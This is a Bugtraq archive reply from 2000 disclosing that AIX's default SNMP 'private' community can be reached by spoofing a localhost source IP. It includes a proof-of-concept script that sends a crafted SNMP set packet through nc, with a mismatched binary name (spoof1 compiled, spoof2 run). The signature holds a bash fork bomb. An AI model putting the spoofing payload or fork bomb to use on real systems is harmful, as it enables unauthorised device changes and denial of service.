Bugtraq mailing list archives
Re: AIX SNMP Defaults
From: lcamtuf () DIONE IDS PL (Michal Zalewski)
Date: Thu, 17 Feb 2000 11:28:54 +0100
On Tue, 15 Feb 2000, harikiri wrote:
It appears that on the above releases of AIX, the SNMP daemon is enabled by default and two community names are enabled with read/write privileges. The community names are "private" and "system", but are only allowed from localhost connections. Nevertheless, a local user may install an SNMP client, and modify sensitive variables.
SNMP requests with no authentication except for source-IP comparsion, are spoofable. --snip-- #!/bin/bash cat >/tmp/spoof1.c <<_EOF_ char private[]="0\202\0-\2\1\0\4\7private\243\37\2\1\1\2\1\0\2\1\0000\0240\202" "\0\20\6\10+\6\1\2\1\1\4\0\4\4null"; main() { write(1,private,sizeof(private)); } _EOF_ gcc -o /tmp/spoof1 /tmp/spoof1.c /tmp/spoof2 | nc -s FakeSourceIPHere -u RemoteIPHere 161 --snip-- UDP blind spoofing, nothing easier. _______________________________________________________ Michal Zalewski * [lcamtuf () ags pl] <=> [AGS WAN SYSADM] [dione.ids.pl SYSADM] <-> [http://lcamtuf.na.export.pl] [+48 22 813 25 86] [+48 603 110 160] bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----=
Current thread:
- Re: AUTORUN.INF Vulnerability, (continued)
- Re: AUTORUN.INF Vulnerability Jesper M. Johansson (Feb 18)
- UPDATED: NetBSD Security Advisory 2000-001 Daniel Carosone (Feb 18)
- Re: AUTORUN.INF Vulnerability Nick FitzGerald (Feb 19)
- Re: AUTORUN.INF Vulnerability Valentin Pletzer (Feb 20)
- MMDF Ran Atkinson (Feb 18)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Brock Sides (Feb 18)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Bennett Todd (Feb 18)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Dennis Taylor (Feb 18)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Kevin Hillabolt (Feb 14)
- AIX SNMP Defaults harikiri (Feb 15)
- Re: AIX SNMP Defaults Michal Zalewski (Feb 17)
- Re: AIX SNMP Defaults Troy Bollinger (Feb 21)
- riched32.dll buffer overflow Pauli Ojanpera (Feb 21)
- Re: AIX SNMP Defaults Troy Bollinger (Feb 17)
- Security Bulletins Digest Aleph One (Feb 17)
- AIX SNMP Defaults harikiri (Feb 15)
- Re: perl-cgi hole in UltimateBB by Infopop Corp. Jordan Ritter (Feb 15)